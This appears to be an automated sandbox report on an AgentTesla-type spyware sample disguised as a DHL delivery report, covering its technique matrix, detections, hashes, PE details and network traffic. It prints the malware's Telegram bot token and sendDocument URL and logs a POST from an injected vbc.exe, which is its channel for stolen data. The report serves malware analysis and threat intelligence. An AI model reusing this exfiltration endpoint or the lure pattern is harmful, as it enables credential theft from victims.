Domain Accounts	At (Linux)	Logon Script (Windows)	311 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Valid Accounts	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	311 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Dhl recent package delivery report needs attention.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Dhl recent package delivery report needs attention.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack	100%	Avira	HEUR/AGEN.1235971	Download File
2.0.vbc.exe.610000.0.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
2.0.vbc.exe.610000.4.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
2.0.vbc.exe.610000.3.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack	100%	Avira	HEUR/AGEN.1235971	Download File
2.0.vbc.exe.610000.1.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
2.2.vbc.exe.610000.0.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
2.0.vbc.exe.610000.2.unpack	100%	Avira	HEUR/AGEN.1203035	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.smartassembly.com/webservices/Reporting/UploadReport2v	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://hEsAGj.com	0%	Avira URL Cloud	safe
https://dafa.fa	0%	Avira URL Cloud	safe
https://api.telegram.org4Hkp	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/Reporting/L	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/Reporting/UploadReport2	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
https://uyuDgc6hArJiFp.org	0%	Avira URL Cloud	safe
http://www.smartassembly.com/webservices/UploadReportLogin/	0%	URL Reputation	safe
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.smartassembly.com/webservices/Reporting/UploadReport2v	Dhl recent package delivery report needs attention.exe	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://hEsAGj.com	vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/	Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmp	false		high
https://dafa.fa	Dhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org4Hkp	vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.smartassembly.com/webservices/Reporting/L	Dhl recent package delivery report needs attention.exe	false	Avira URL Cloud: safe	unknown
http://www.smartassembly.com/webservices/Reporting/UploadReport2	Dhl recent package delivery report needs attention.exe	false	URL Reputation: safe	unknown
https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentdocument-----	vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me	Dhl recent package delivery report needs attention.exe	false		high
https://uyuDgc6hArJiFp.org	vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	vbc.exe, 00000002.00000002.639895069.0000000006CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.smartassembly.com/webservices/UploadReportLogin/	Dhl recent package delivery report needs attention.exe	false	URL Reputation: safe	unknown
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL	Dhl recent package delivery report needs attention.exe	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626595
Start date and time: 14/05/202215:09:37	2022-05-14 15:09:37 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Dhl recent package delivery report needs attention.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 1.1% (good quality ratio 0.6%) Quality average: 43.4% Quality standard deviation: 40.4%
HCA Information:	Successful, ratio: 82% Number of executed functions: 37 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:10:53	API Interceptor	1x Sleep call for process: Dhl recent package delivery report needs attention.exe modified
15:11:00	API Interceptor	749x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
149.154.167.220	S.O.A18052022.exe	Get hash	malicious	Browse
	e3.exe	Get hash	malicious	Browse
	d5.exe	Get hash	malicious	Browse
	TransactionAdviceDetailsReport-20220513-091440.exe	Get hash	malicious	Browse
	NN doc,TT Swift Copy.exe	Get hash	malicious	Browse
	SHIPPING DETAILS.PIF.EXE	Get hash	malicious	Browse
	Updatedcontract051222.exe	Get hash	malicious	Browse
	Halkbank_Ekstre_20220512_082357_541079.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.8516.exe	Get hash	malicious	Browse
	Angebot Nr. 58022.xlsx	Get hash	malicious	Browse
	doc_65398086_4190362045539.pdf.vbs	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Lazy.178938.10008.exe	Get hash	malicious	Browse
	VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exe	Get hash	malicious	Browse
	TNT AWB.exe	Get hash	malicious	Browse
	T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	Browse
	TransactionAdviceDetailsReport-20220512-091440.pdf.exe	Get hash	malicious	Browse
	4BDAd47i.txt.cmd	Get hash	malicious	Browse
	Elden Ring Installer.exe	Get hash	malicious	Browse
	Transferencia.exe	Get hash	malicious	Browse
	Orden de compra .exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api.telegram.org	S.O.A18052022.exe	Get hash	malicious	Browse	149.154.167.220
	Bank TT slip.xlsx	Get hash	malicious	Browse	149.154.167.220
	SOA.exe	Get hash	malicious	Browse	149.154.167.220
	e3.exe	Get hash	malicious	Browse	149.154.167.220
	d5.exe	Get hash	malicious	Browse	149.154.167.220
	TransactionAdviceDetailsReport-20220513-091440.exe	Get hash	malicious	Browse	149.154.167.220
	NN doc,TT Swift Copy.exe	Get hash	malicious	Browse	149.154.167.220
	SHIPPING DETAILS.PIF.EXE	Get hash	malicious	Browse	149.154.167.220
	Updatedcontract051222.exe	Get hash	malicious	Browse	149.154.167.220
	Order_List.xlsx	Get hash	malicious	Browse	149.154.167.220
	Halkbank_Ekstre_20220512_082357_541079.exe	Get hash	malicious	Browse	149.154.167.220
	soa.xlsx	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetect.malware2.8516.exe	Get hash	malicious	Browse	149.154.167.220
	Angebot Nr. 58022.xlsx	Get hash	malicious	Browse	149.154.167.220
	doc_65398086_4190362045539.pdf.vbs	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Lazy.178938.10008.exe	Get hash	malicious	Browse	149.154.167.220
	Mvmsrl 0512-22021.exe	Get hash	malicious	Browse	149.154.167.220
	VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exe	Get hash	malicious	Browse	149.154.167.220
	TNT AWB.exe	Get hash	malicious	Browse	149.154.167.220
	T#U00dcB#U0130TAK SAGE F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	S.O.A18052022.exe	Get hash	malicious	Browse	149.154.167.220
	https://telegra.ph/Invoice-05-13	Get hash	malicious	Browse	149.154.167.99
	e3.exe	Get hash	malicious	Browse	149.154.167.220
	d5.exe	Get hash	malicious	Browse	149.154.167.220
	TransactionAdviceDetailsReport-20220513-091440.exe	Get hash	malicious	Browse	149.154.167.220
	NN doc,TT Swift Copy.exe	Get hash	malicious	Browse	149.154.167.220
	SHIPPING DETAILS.PIF.EXE	Get hash	malicious	Browse	149.154.167.220
	Updatedcontract051222.exe	Get hash	malicious	Browse	149.154.167.220
	Halkbank_Ekstre_20220512_082357_541079.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.W32.AIDetect.malware2.8516.exe	Get hash	malicious	Browse	149.154.167.220
	Angebot Nr. 58022.xlsx	Get hash	malicious	Browse	149.154.167.220
	doc_65398086_4190362045539.pdf.vbs	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Variant.Jaik.72893.16950.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.Variant.Lazy.178938.10008.exe	Get hash	malicious	Browse	149.154.167.220
	VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exe	Get hash	malicious	Browse	149.154.167.220
	YzZvXNPftX.exe	Get hash	malicious	Browse	149.154.167.99
	BJgh7q8C66.exe	Get hash	malicious	Browse	149.154.167.99
	Kaufvertrag.lnk	Get hash	malicious	Browse	149.154.167.99
	TNT AWB.exe	Get hash	malicious	Browse	149.154.167.220
	9vfBClHPAP.exe	Get hash	malicious	Browse	149.154.167.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	7ECCDD2DFBA647FAC22066819DC893C1CB467252A2381.exe	Get hash	malicious	Browse	149.154.167.220
	Shipping Details.PIF.exe	Get hash	malicious	Browse	149.154.167.220
	RFQ. 220 & Drawings.exe	Get hash	malicious	Browse	149.154.167.220
	S.O.A18052022.exe	Get hash	malicious	Browse	149.154.167.220
	Zadaca3RPR.exe	Get hash	malicious	Browse	149.154.167.220
	n2vBPxeTmB.exe	Get hash	malicious	Browse	149.154.167.220
	https://ipfs.io/ipfs/QmUn5FAzssu1Q4Q5X6EJxkCNUADLuB5NcLV5kQeJbdrvB8?key=84f132305c07d7ed00df4ca65f2d815b&redirect=https://www.amazon.com	Get hash	malicious	Browse	149.154.167.220
	@NorthBearStation-454eeabe-4b02-4cc3-bad6-94eefdbe6030.exe	Get hash	malicious	Browse	149.154.167.220
	https://1drv.ms/u/s!AjqXvdUL1pFHig77Jv0vSMtrWnBP?e=CouTYe	Get hash	malicious	Browse	149.154.167.220
	gayporn.exe	Get hash	malicious	Browse	149.154.167.220
	Syhwdgsr.exe	Get hash	malicious	Browse	149.154.167.220
	854F1E97-5DBB-4A87-A566-33D9012B05E3.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html	Get hash	malicious	Browse	149.154.167.220
	e3.exe	Get hash	malicious	Browse	149.154.167.220
	d5.exe	Get hash	malicious	Browse	149.154.167.220
	DENUNCIA IMPUESTA EN SU CONTRA.exe	Get hash	malicious	Browse	149.154.167.220
	https://cremodom.cf/mansion/#talia.bleakley@foster-gamko.com	Get hash	malicious	Browse	149.154.167.220
	TransactionAdviceDetailsReport-20220513-091440.exe	Get hash	malicious	Browse	149.154.167.220
	https://sync.crwdcntrl.net/map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=62553350917825036762023184708005776201?https%3A%2F%2Fsign-smpu724eb7r29qzs1gw162nd2cilb0gppxkyfq3q1rk.website%E2%80%8B.yandexcloud.net%23dbrodie@standrew.co.uk	Get hash	malicious	Browse	149.154.167.220
	https://tmsteels.dotling.com/	Get hash	malicious	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	805
Entropy (8bit):	5.360596073797118
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhk:MIHK5HKXE1qHmAHKzvRYHKhQnok
MD5:	366792B833C0D8969A74B40FBB71B7D8
SHA1:	404610028972C443AD98E00455F03037D022DCA9
SHA-256:	653326591133197ACF3B973C5EF35C4373D7BC8ED9D143E02DDC26C48CD65723
SHA-512:	8DBBBF083738332F7DE278C6CEF1010F3FBFA5509B18EDD0B6A1D1950EC3DF5FE9B0298ED1AE09A08500CEF0264F9028880CC38B8C9DA81EAD0314B7FBFD6F02
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.275416787941844
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Dhl recent package delivery report needs attention.exe
File size:	550400
MD5:	163d3bc2c523dc10c959474aa3f69d56
SHA1:	5338e0aaea69b582d22ff624b4a9fd4efc9eb707
SHA256:	1040411f26f6464fb485e92e74c08c559a6feb9bed0eadc44e831a08c80e8a01
SHA512:	675538d727c564fc80a42b868a4025105ae8c4df10da5e5df0aa93c95be608ff9f89e5b35a366fba6f2a5aac703aca46a9d5c76978a160b64824b8b09527c5c1
SSDEEP:	6144:PEmVKcUXWckAJnwNtuOeB2d/t8CdZy9QD/EsQYhT6qphrf5mAz2:MmTUGvxeBJCd5DMTbqz5Dz
TLSH:	1AC49E1D638F0FD1D36A063D82A19654C238EE15C886F70F78C02BB6E9363D79961B67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.}b............................g.... ........@.. ....................................@................................

File Icon


Icon Hash:	9aa3a38a8383929a

Static PE Info

General

Entrypoint:	0x45ec67
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x627DB860 [Fri May 13 01:46:08 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5ec1d	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x60000	0x2926c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5cc6d	0x5ce00	False	0.763629815781	data	7.52092762283	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x60000	0x2926c	0x29400	False	0.0292850378788	data	1.62115337498	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x600ac	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x708f8	0x25a8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x72ec4	0x10a8	data
RT_ICON	0x73f90	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0x7441c	0x10828	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x84c68	0x25a8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x87234	0x10a8	data
RT_ICON	0x88300	0x468	GLS_BINARY_LSB_FIRST
RT_DIALOG	0x887a4	0x11c	data
RT_GROUP_ICON	0x88926	0x3e	data
RT_GROUP_ICON	0x889b0	0x3e	data
RT_VERSION	0x88a2a	0x60c	data
RT_MANIFEST	0x89072	0x1fa	XML 1.0 document, ASCII text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0409 0x04e4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 15:11:12.245178938 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.245270014 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.245419979 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.278245926 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.278285980 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.339421034 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.339623928 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.343590021 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.343640089 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.343913078 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.552504063 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.552637100 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.754854918 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.787767887 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.791682959 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.832510948 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.906265974 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.906373024 CEST	443	49770	149.154.167.220	192.168.2.6
May 14, 2022 15:11:12.906445026 CEST	49770	443	192.168.2.6	149.154.167.220
May 14, 2022 15:11:12.908200979 CEST	49770	443	192.168.2.6	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 15:11:12.166580915 CEST	60350	53	192.168.2.6	8.8.8.8
May 14, 2022 15:11:12.184549093 CEST	53	60350	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 14, 2022 15:11:12.166580915 CEST	192.168.2.6	8.8.8.8	0x81ff	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 14, 2022 15:11:12.184549093 CEST	8.8.8.8	192.168.2.6	0x81ff	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49770	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-14 13:11:12 UTC	0	OUT	POST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6 Host: api.telegram.org Content-Length: 1007 Expect: 100-continue Connection: Keep-Alive
2022-05-14 13:11:12 UTC	0	IN	HTTP/1.1 100 Continue
